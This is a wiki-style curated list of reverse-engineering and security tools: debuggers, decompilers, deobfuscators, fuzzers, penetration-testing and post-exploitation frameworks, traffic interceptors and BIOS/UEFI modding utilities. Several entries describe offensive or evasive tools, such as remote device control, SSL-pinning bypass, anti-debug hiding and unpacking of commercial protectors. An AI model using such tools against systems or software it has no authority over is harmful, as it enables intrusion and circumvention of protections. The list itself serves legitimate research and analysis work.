*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.

::Binary Ninja Scripts/Plugins/Extension
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.

*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].

::Ghidra Scripts/Plugins/Extension
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm & MIPS scripts] - ARM & MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.
:::*Qt Framework
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled & compiled with MSVC.
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.

*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.

::IDA Scripts/Plugins/Extension
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.
::::*Oreans CV scripts
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.
::IDA LLM Plugins
:::*Local (quantized LLMs Q4/INT4)
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.
:::*Cloud
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.

*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).

*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)

*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.

*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.

*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.

*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.

=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====

*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework. Includes Disassembler, Debugger, Emulation and Symbolik analysis engines. Includes built-in Server and Shared-Workspace functionality. Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism). Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA. Criticisms (from a core dev): "Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better. PR's and suggestions welcome." Best installed via Pip: <code>python3 -m pip install vivisect</code>

*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)

*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).

*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.

::OllyDbg Scripts/Plugins/Mods
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.

*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.

::x64dbg Plugins/Integrations/Templates
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for "all" versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.

*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.

*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.

::GDB Plugins/Integrations/Templates
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.

*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.

====Debugging and Profiling dynamic analysis (Linux)====

*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.

*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.

*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.

*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.

*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.

*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.

====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====

=====.NET (CLR)=====

*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo & '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.

======.NET deobfuscators======

::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.

======.NET memory dumpers======

::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.

======.NET tracers======

::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.

=====JAVA (JVM) Decompilers=====

:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly & Ethereum Decompilers.

======JAVA (ART/APK)======
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.

:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR & Dex decompiler for android.
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.

======RASP (Runtime Application Self-Protection) Android======
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing. 
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted. 
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.

======JAVA deobfuscators (mixed platforms)======
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.

:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...

======JAVA decompilers (platform independent)======
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.

====Debuggers / Disassemblers for '''unmanaged''' binaries====

=====AutoIt=====
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of "compiled" AutoIt scripts from PE executables.

=====VB6=====
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables.
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.

====Bytecode Decompilers====

=====React Native Hermes=====
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.

:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).

=====Python=====
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.

=====Lua=====
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.

----

====Fuzzers====

*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).

*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.

*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.

*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).

*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.

*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.

*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.

====PC platform exploration frameworks====

*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.

*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.

*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.

====Mobile exploration frameworks====

*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.

*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.

*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.

*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.

*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.

*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.

*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.

::LSPosed Module Repository
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.

*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].

::Xposed modules
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..

::Xposed Framework API Development Documentation
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.

====Network Inspection====

=====Promiscuous mode eavesdropping TCP/UDP=====

::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows.

::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source & easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.

::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis & modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.

=====HTTP(S) Debuggers / Web Debuggers=====

::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.

::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.

::*[https://github.com/httptoolkit HTTP Toolkit] - is a beautiful, cross-platform & open-source HTTP(S) debugging proxy, analyzer & client, with built-in support for modern tools from Docker to Android to GraphQL.

::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.

::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler & Postman together with beautiful, modern UI & collaboration features.

::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.

=====Other Network Tools=====

::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).

::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.

::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.

::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

----

====BIOS (basic input/output system) firmware modifying software====
Unified Extensible Firmware Interface (UEFI) & legacy computer BIOS (basic input/output system) firmware modifying software. 

=====UEFI=====
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 & >>) InsydeH2o because of SMM protection or variable locking.
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 & >>) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.

=====BIOS (legacy)=====
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.
:::'''AMI'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]
